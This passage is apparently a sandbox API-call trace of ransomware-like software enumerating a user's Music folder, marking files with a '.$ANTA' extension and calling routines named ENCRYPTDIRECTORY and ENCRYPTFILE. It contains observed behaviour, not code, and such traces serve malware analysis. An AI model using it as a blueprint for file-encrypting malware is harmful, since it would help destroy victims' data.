RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0111.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0111.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0111.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0111.414] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd98187, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xdd98187, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xde56dd7, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xe2a0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="fR5QK.wav.$ANTA", cAlternateFileName="FR5QKW~1.$AN")) returned 1 [0111.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0111.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0111.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0111.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0111.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0111.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0111.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0111.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0111.414] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0111.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0111.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0111.414] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0111.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0111.415] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0111.415] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0111.415] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf61eb4, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xdf61eb4, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xe020a1c, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x12fc0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="gXtG5sqySgJuIPIsH.mp3.$ANTA", cAlternateFileName="GXTG5S~1.$AN")) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0111.415] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0111.415] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0111.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0111.416] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0111.416] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0111.416] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe151cf4, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xe151cf4, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xe19e271, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x12e10, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="Juj1PsS7vx.m4a.$ANTA", cAlternateFileName="JUJ1PS~1.$AN")) returned 1 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0111.416] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0111.416] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0111.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0111.416] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2cf504, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xe2cf504, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xe5ca1eb, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x10c20, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="MZTSENpJHOvP.mp3.$ANTA", cAlternateFileName="MZTSEN~1.$AN")) returned 1 [0111.416] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb4634ef0, ftCreationTime.dwHighDateTime=0x1d5f0bd, ftLastAccessTime.dwLowDateTime=0xd6622ec0, ftLastAccessTime.dwHighDateTime=0x1d5e7a0, ftLastWriteTime.dwLowDateTime=0xd6622ec0, ftLastWriteTime.dwHighDateTime=0x1d5e7a0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="RjvHKIDt9", cAlternateFileName="RJVHKI~1")) returned 1 [0111.468] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d1a2630, ftCreationTime.dwHighDateTime=0x1d5eeb1, ftLastAccessTime.dwLowDateTime=0x13182270, ftLastAccessTime.dwHighDateTime=0x1d5ee54, ftLastWriteTime.dwLowDateTime=0x13182270, ftLastWriteTime.dwHighDateTime=0x1d5ee54, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="spIObPh75b", cAlternateFileName="SPIOBP~1")) returned 1 [0111.468] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c872b50, ftCreationTime.dwHighDateTime=0x1d5e3f8, ftLastAccessTime.dwLowDateTime=0xd4b41fc0, ftLastAccessTime.dwHighDateTime=0x1d5e944, ftLastWriteTime.dwLowDateTime=0xd4b41fc0, ftLastWriteTime.dwHighDateTime=0x1d5e944, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="tG2O", cAlternateFileName="")) returned 1 [0111.468] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe747969, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xe747969, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xe8065d0, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="xJgB9.wav.$ANTA", cAlternateFileName="XJGB9W~1.$AN")) returned 1 [0111.468] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e2390, ftCreationTime.dwHighDateTime=0x144eff0, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e2390, ftLastWriteTime.dwLowDateTime=0x43ea040, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="", cAlternateFileName="豈мńဓ+\x10")) returned 0 [0111.468] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0111.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|9sMMb260B1u|RjvHKIDt9|spIObPh75b|tG2O", cchCount1=38, lpString2="", cchCount2=0) returned 3 [0111.468] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0111.468] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0111.468] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u")) returned 0x10 [0111.469] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f32a4e0, ftCreationTime.dwHighDateTime=0x1d5e288, ftLastAccessTime.dwLowDateTime=0x53cc5140, ftLastAccessTime.dwHighDateTime=0x1d5ef32, ftLastWriteTime.dwLowDateTime=0x53cc5140, ftLastWriteTime.dwHighDateTime=0x1d5ef32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca310, cFileName=".", cAlternateFileName="")) returned 0x41ac540 [0111.469] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f32a4e0, ftCreationTime.dwHighDateTime=0x1d5e288, ftLastAccessTime.dwLowDateTime=0x53cc5140, ftLastAccessTime.dwHighDateTime=0x1d5ef32, ftLastWriteTime.dwLowDateTime=0x53cc5140, ftLastWriteTime.dwHighDateTime=0x1d5ef32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca310, cFileName="..", cAlternateFileName="")) returned 1 [0111.469] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x612d0730, ftCreationTime.dwHighDateTime=0x1d5e2d5, ftLastAccessTime.dwLowDateTime=0x33d059f0, ftLastAccessTime.dwHighDateTime=0x1d5e3a1, ftLastWriteTime.dwLowDateTime=0x33d059f0, ftLastWriteTime.dwHighDateTime=0x1d5e3a1, nFileSizeHigh=0x0, nFileSizeLow=0x1eef, dwReserved0=0x0, dwReserved1=0x43ca310, cFileName="7eNkYBcGM pJGAedeLc.mp3", cAlternateFileName="7ENKYB~1.MP3")) returned 1 [0111.469] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ca2b470, ftCreationTime.dwHighDateTime=0x1d5ec0d, ftLastAccessTime.dwLowDateTime=0x94593bc0, ftLastAccessTime.dwHighDateTime=0x1d5ec5c, ftLastWriteTime.dwLowDateTime=0x94593bc0, ftLastWriteTime.dwHighDateTime=0x1d5ec5c, nFileSizeHigh=0x0, nFileSizeLow=0x10430, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="bg_rcFiS42y.mp3", cAlternateFileName="BG_RCF~1.MP3")) returned 1 [0111.469] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa25e60, ftCreationTime.dwHighDateTime=0x1d5ef94, ftLastAccessTime.dwLowDateTime=0xaaabc190, ftLastAccessTime.dwHighDateTime=0x1d5e676, ftLastWriteTime.dwLowDateTime=0xaaabc190, ftLastWriteTime.dwHighDateTime=0x1d5e676, nFileSizeHigh=0x0, nFileSizeLow=0xfc5a, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="D4sWWmt- Hf4jGE2.mp3", cAlternateFileName="D4SWWM~1.MP3")) returned 1 [0111.469] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80dd97f0, ftCreationTime.dwHighDateTime=0x1d5ead4, ftLastAccessTime.dwLowDateTime=0x1883d600, ftLastAccessTime.dwHighDateTime=0x1d5e189, ftLastWriteTime.dwLowDateTime=0x1883d600, ftLastWriteTime.dwHighDateTime=0x1d5e189, nFileSizeHigh=0x0, nFileSizeLow=0x5975, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="dle rck7Umm-.wav", cAlternateFileName="DLERCK~1.WAV")) returned 1 [0111.469] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1d09060, ftCreationTime.dwHighDateTime=0x1d5e256, ftLastAccessTime.dwLowDateTime=0xfe02eaa0, ftLastAccessTime.dwHighDateTime=0x1d5e18d, ftLastWriteTime.dwLowDateTime=0xfe02eaa0, ftLastWriteTime.dwHighDateTime=0x1d5e18d, nFileSizeHigh=0x0, nFileSizeLow=0x16fbe, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="JUnckwz0f9.wav", cAlternateFileName="JUNCKW~1.WAV")) returned 1 [0111.469] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7737e170, ftCreationTime.dwHighDateTime=0x1d5e128, ftLastAccessTime.dwLowDateTime=0x808b4980, ftLastAccessTime.dwHighDateTime=0x1d5efc7, ftLastWriteTime.dwLowDateTime=0x808b4980, ftLastWriteTime.dwHighDateTime=0x1d5efc7, nFileSizeHigh=0x0, nFileSizeLow=0x12464, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="P0gI1wm_F5y2n.m4a", cAlternateFileName="P0GI1W~1.M4A")) returned 1 [0111.469] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc2064c0, ftCreationTime.dwHighDateTime=0x1d5e225, ftLastAccessTime.dwLowDateTime=0x60f4f620, ftLastAccessTime.dwHighDateTime=0x1d5e2a7, ftLastWriteTime.dwLowDateTime=0x60f4f620, ftLastWriteTime.dwHighDateTime=0x1d5e2a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="xavp", cAlternateFileName="")) returned 1 [0111.469] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6269c470, ftCreationTime.dwHighDateTime=0x1d5e1fa, ftLastAccessTime.dwLowDateTime=0x6f35fe70, ftLastAccessTime.dwHighDateTime=0x1d5e868, ftLastWriteTime.dwLowDateTime=0x6f35fe70, ftLastWriteTime.dwHighDateTime=0x1d5e868, nFileSizeHigh=0x0, nFileSizeLow=0x14149, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="_lDKW-L4K_DTCAjQT1.wav", cAlternateFileName="_LDKW-~1.WAV")) returned 1 [0111.469] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2500, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x1f, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c356c, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="ﲘмńဓ+\x10")) returned 0 [0111.469] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0111.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|7eNkYBcGM pJGAedeLc.mp3|bg_rcFiS42y.mp3|D4sWWmt- Hf4jGE2.mp3|dle rck7Umm-.wav|JUnckwz0f9.wav|P0gI1wm_F5y2n.m4a|_lDKW-L4K_DTCAjQT1.wav", cchCount1=134, lpString2="", cchCount2=0) returned 3 [0111.470] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0111.470] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\7eNkYBcGM pJGAedeLc.mp3", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x612d0730, ftCreationTime.dwHighDateTime=0x1d5e2d5, ftLastAccessTime.dwLowDateTime=0x33d059f0, ftLastAccessTime.dwHighDateTime=0x1d5e3a1, ftLastWriteTime.dwLowDateTime=0x33d059f0, ftLastWriteTime.dwHighDateTime=0x1d5e3a1, nFileSizeHigh=0x0, nFileSizeLow=0x1eef, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="7eNkYBcGM pJGAedeLc.mp3", cAlternateFileName="7ENKYB~1.MP3")) returned 0x41ac700 [0111.470] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0111.470] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0111.470] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0111.470] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0111.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0111.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca868, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0111.470] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\7eNkYBcGM pJGAedeLc.mp3" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\7enkybcgm pjgaedelc.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0111.471] FreeLibrary (hLibModule=0x772d0000) returned 1 [0111.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0111.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0111.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0111.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0111.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0111.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0111.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0111.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0111.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0111.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0111.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0111.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0111.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0111.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0111.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0111.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0111.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0111.471] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0111.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0111.471] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 